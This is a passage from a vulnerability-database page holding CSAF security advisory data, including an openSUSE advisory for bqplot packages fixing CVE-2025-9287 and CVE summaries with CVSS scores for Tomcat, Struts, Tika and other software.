"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Apache Tomcat versions 1.0.0-M1 to 11.0.10 are vulnerable to a directory traversal issue that may allow remote code execution if HTTP PUT requests are enabled, alongside other security vulnerabilities in HPE UOCAM.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-55752 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-55752.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-55752"
},
{
"cve": "CVE-2025-64775",
"cwe": {
"id": "CWE-459",
"name": "Incomplete Cleanup"
},
"notes": [
{
"category": "other",
"text": "Incomplete Cleanup",
"title": "CWE-459"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Apache Struts versions 2.0.0 to 6.7.0 and 7.0.0 to 7.0.3 have a Denial of Service vulnerability due to file leak in multipart request processing, affecting NetApp products.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64775 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-64775.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-64775"
},
{
"cve": "CVE-2025-66516",
"cwe": {
"id": "CWE-611",
"name": "Improper Restriction of XML External Entity Reference"
},
"notes": [
{
"category": "other",
"text": "Improper Restriction of XML External Entity Reference",
"title": "CWE-611"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Apache Tika has multiple critical XML External Entity (XXE) injection vulnerabilities, particularly affecting PDF parsing, allowing remote attackers to exploit crafted documents for sensitive data disclosure and remote code execution.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-66516 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-66516.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-66516"
},
{
"cve": "CVE-2025-9287",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "description",
"text": "The document outlines a vulnerability in the `create-hash` package due to inadequate input type checks, leading to potential hash state manipulation and security risks, particularly in the `cipher-base` npm package versions up to 1.0.4.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-9287 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-9287.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-9287"
},
{
"cve": "CVE-2025-9288",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "description",
"text": "The document outlines a vulnerability in `sha.js` versions up to 2.4.11 due to insufficient input type checks, leading to potential denial of service and private key extraction risks.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-9288 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-9288.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
}
],
"title": "CVE-2025-9288"
},
{
"cve": "CVE-2026-21569",
"notes": [
{
"category": "description",
"text": "A high severity XXE vulnerability in Crowd Data Center and Server version 7.1.0 has a CVSS score of 7.9, allowing authenticated attackers to access sensitive content without user interaction.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-21569 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-21569.json"
}
],
"title": "CVE-2026-21569"
}
]
}
OPENSUSE-SU-2025:15485-1
Vulnerability from csaf_opensuse - Published: 2025-08-22 00:00 - Updated: 2025-08-22 00:00Summary
jupyter-bqplot-jupyterlab-0.5.46-12.1 on GA media
Severity
Moderate
Notes
Title of the patch: jupyter-bqplot-jupyterlab-0.5.46-12.1 on GA media
Description of the patch: These are all security issues fixed in the jupyter-bqplot-jupyterlab-0.5.46-12.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2025-15485
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
9 (Critical)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
critical
References
5 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "jupyter-bqplot-jupyterlab-0.5.46-12.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the jupyter-bqplot-jupyterlab-0.5.46-12.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15485",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15485-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-9287 page",
"url": "https://www.suse.com/security/cve/CVE-2025-9287/"
}
],
"title": "jupyter-bqplot-jupyterlab-0.5.46-12.1 on GA media",
"tracking": {
"current_release_date": "2025-08-22T00:00:00Z",
"generator": {
"date": "2025-08-22T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15485-1",
"initial_release_date": "2025-08-22T00:00:00Z",
"revision_history": [
{
"date": "2025-08-22T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
"product_id": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-12.1.aarch64",
"product": {
"name": "python311-bqplot-0.12.45-12.1.aarch64",
"product_id": "python311-bqplot-0.12.45-12.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
"product_id": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-12.1.ppc64le",
"product": {
"name": "python311-bqplot-0.12.45-12.1.ppc64le",
"product_id": "python311-bqplot-0.12.45-12.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-12.1.s390x",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-12.1.s390x",
"product_id": "jupyter-bqplot-notebook-0.5.46-12.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-12.1.s390x",
"product": {
"name": "python311-bqplot-0.12.45-12.1.s390x",
"product_id": "python311-bqplot-0.12.45-12.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
"product_id": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-12.1.x86_64",
"product": {
"name": "python311-bqplot-0.12.45-12.1.x86_64",
"product_id": "python311-bqplot-0.12.45-12.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-12.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-12.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-12.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64"
},
"product_reference": "python311-bqplot-0.12.45-12.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-12.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le"
},
"product_reference": "python311-bqplot-0.12.45-12.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-12.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x"
},
"product_reference": "python311-bqplot-0.12.45-12.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-12.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64"
},
"product_reference": "python311-bqplot-0.12.45-12.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-9287",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-9287"
}
],
"notes": [
{
"category": "general",
"text": "Improper Input Validation vulnerability in cipher-base allows Input Data Manipulation.This issue affects cipher-base: through 1.0.4.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-9287",
"url": "https://www.suse.com/security/cve/CVE-2025-9287"
},
{
"category": "external",
"summary": "SUSE Bug 1248429 for CVE-2025-9287",
"url": "https://bugzilla.suse.com/1248429"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-12.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-12.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-12.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-08-22T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-9287"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…